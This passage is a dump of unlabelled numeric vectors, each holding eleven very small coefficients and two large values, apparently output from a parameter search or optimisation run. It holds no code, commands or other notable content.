-1.4446129047664535e-10, -1.8210829282495652e-15, 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, 101879284463.33914]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, 102270797763.39908]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]\n\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.7704075824842225e-11, -1.8975666267494283e-10, -1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 166731944707.48343, 109962566902.69849]\n\n[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15, 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, 111850971687.16727]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15, 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, 128488226222.4665]\n\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15, 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -1.836034443165441e-08, 
9.148927620445716e-10, 115664967416.85544, 172987399752.44284]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, 100937635343.36494]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, 101440046940.62292]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, 101522685052.87083]\n\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 
4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, 102059630396.96977]\n\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06, -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, 102134941196.42899]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, 102270797763.3992]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, 102270797763.39929]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15, 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, 102518032445.5969]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15, 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, 102577021916.3392]\n\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, 
-1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, 112061347287.60056]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, 136457449593.06062]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, 160562679389.67618]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, 101215117638.35565]\n\n[-2.0926038768787875e-10, -1.3382357152930057e-12, 
-1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, 101220474756.55742]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, 101440046940.6675]\n\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, 101479475091.5439]\n\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06, -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, 101707557509.25955]\n\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.815489945689696e-16, 2.492800478197597e-05, 
-1.799557982850986e-06, -1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, 101910116331.42278]\n\n[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13, 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, 101942928295.47075]\n\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, 104790698646.6004]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8168585276282465e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10, 160649925757.17908, 106424978687.80653]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, 106648081137.30634]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, 106784848298.00577]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, 106918161793.97298]\n\n[-8.372802930516975e-10, 
-1.3359785407261977e-12, -1.9347415380665696e-13, 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, 117274357359.96004]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, 118996909122.33968]\n\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, 125656067768.88814]\n\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, 191438895729.71088]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, 99223644222.007]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 
2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]\n\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, 100180028793.61896]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, 100223589650.82378]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, 100558408593.70113]\n\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8877585360256924e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193351738763.71564, 100949387586.23102]\n\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, 101220474756.86967]\n\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, 
101440046940.05927]\n\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, 101467426817.57397]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.8327983670281894e-11, -1.4675478300173032e-10, -1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10, 193392923341.53983, 101900620617.14302]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, 103131734300.077]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, 103180541968.40872]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, 103805616436.34537]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, 106843736334.12831]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, 4.855683396544643e-11, -1.4675478300173032e-10, 
-1.8130493256774034e-15, 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, 110030788135.34956]\n\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, 111006224451.55664]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, 113087422800.04585]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, 115101067854.69138]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, 126984206927.84627]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, 98138013390.26245]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 
195862055252.45816, 98829512345.71414]\n\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15, 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, 98891303611.42876]\n\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, 99638222233.03885]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, 99962477826.90034]\n\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, 100180028793.6191]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, 100290100926.3771]\n\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, 100447140164.3877]\n\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, 4.852404641399239e-11, 
-1.463585775827913e-10, -1.812045689500589e-15, 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, 100872818268.9527]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, 101076246798.6337]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, 101683114493.3993]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, 105699410466.83022]\n\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, 105861289429.36061]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, 106068644665.40553]\n\n[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, -1.836034443165441e-08, 
9.087979750822277e-10, 147793960453.4741, 109638154986.2024]\n\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15, 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, 114344342719.97507]\n\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, 115101067854.31332]\n\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, 120797794814.05704]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, 133721716481.47603]\n\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, 147005409641.27127]\n\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15, 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, 156722470654.13324]\n\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 
4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, 167972224844.19583]\n\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, 167972224843.92523]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]\n\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, 160840990423.46024]\n\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, 4.6589669053151376e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 96467208837.94556, 179586543004.98117]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06, -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, 187118262382.8758]\n\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, 
-1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, 187415567631.77402]\n\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.6154548476823616e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.02731, 192873830899.82806]\n\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10, 170388218306.66492, 